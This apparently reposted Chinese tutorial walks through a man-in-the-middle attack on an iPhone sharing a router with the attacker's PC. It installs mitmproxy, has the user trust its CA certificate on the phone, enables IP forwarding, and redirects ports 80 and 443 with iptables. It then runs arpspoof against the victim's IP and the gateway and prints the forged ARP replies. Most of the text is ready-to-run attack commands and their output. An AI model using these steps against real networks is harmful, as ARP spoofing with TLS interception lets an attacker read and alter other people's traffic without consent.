把PC和iPhone链接到同一个路由器上
攻击者和受害者需要在同一局域网内
1.查看发起攻击者的网卡和IP地址:
$ifconfig
eno1: flags=4163 mtu 1500
inet 192.168.2.105 netmask 255.255.255.0 broadcast 192.168.2.255
inet6 fe80::a56b:455a:b152:634c prefixlen 64 scopeid 0x20
ether 3c:52:82:77:89:4a txqueuelen 1000 (Ethernet)
RX packets 6992389 bytes 10246991870 (10.2 GB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 797373 bytes 102866826 (102.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 16 memory 0xf0100000-f0120000
可以看到网卡是:eno1, IP:192.168.2.105
2.查看同一局域网中,被攻击的iPhone的IP:192.168.2.103
0x00 mitmproxy的安装
在 Ubuntu 18.04 上安装
1.首先安装 python3 和 pip3
sudo apt-get install python3 python3-pip
2.安装依赖库
sudo apt-get install openssl
sudo apt-get install libssl-dev
sudo apt-get install libc6-dev gcc
sudo apt-get install -y make build-essential zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm tk-dev
3.安装 mitmproxy
sudo pip3 install mitmproxy
执行mitmproxy命令,如果能看到如下窗口,就说明安装成功了:
mitmproxy
0x01 在安装mitmproxy CA证书
在mitmproxy安装完成之后,并成功运行之后,会在~/.mitmproxy目录下,生成几个证书文件:
mitmproxy-ca-cert.cer
mitmproxy-ca-cert.p12
mitmproxy-ca-cert.pem # iOS 和 Android 设备需要的
mitmproxy-ca.pem
mitmproxy-dhparam.pem
iOS抓包举例:
我们把mitmproxy-ca-cert.pem通过邮箱发送到iPhone上,然后打开邮箱点击证书文件:
image.png
然后进入 设置-通用-描述文件与设备, 就会看到证书文件了,这时候还是未安装状态:
image.png
点击证书文件,进行安装:
image.png
安装完成之后,还有很重要的一步:设置信任刚刚安装的证书。
具体路径是:设置-关于本机-证书信任设置。
image.png
新安装的证书,默认情况下是不被信任的,需要手动开启。
到此结束,mitmproxy 相关的配置已经结束了。
0x02 安装配置arpspoof
sudo apt-get install dsniff
0x03 启用IP转发和端口重定向
sudo sysctl -w net.ipv4.ip_forward=1
#sudo iptables -t nat -A PREROUTING -i 网卡 -p tcp –dport 80 -j REDIRECT –to-port 8080
#sudo iptables -t nat -A PREROUTING -i 网卡 -p tcp –dport 443 -j REDIRECT –to-port 8080
sudo iptables -t nat -A PREROUTING -i eno1 -p tcp –dport 80 -j REDIRECT –to-port 8080
sudo iptables -t nat -A PREROUTING -i eno1 -p tcp –dport 443 -j REDIRECT –to-port 8080
0x04 开启arp伪装
#sudo arpspoof -t 被攻击者IP 网关 -i 网卡
$ sudo arpspoof -t 192.168.2.103 192.168.2.1 -i eno1
# 说明MAC已经被伪装,被攻击者的数据会发到攻击者上
f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53
f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53
f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53
f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53
f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53
f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53
f0:b4:29:3e:a8:53 d8:8f:76:85:d4:1 0806 42: arp reply 192.168.2.1 is-at f0:b4:29:3e:a8:53
0x05开启mitmproxy进行抓包
sudo mitmproxy -T –host
image.png
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/185027.html原文链接:https://javaforall.cn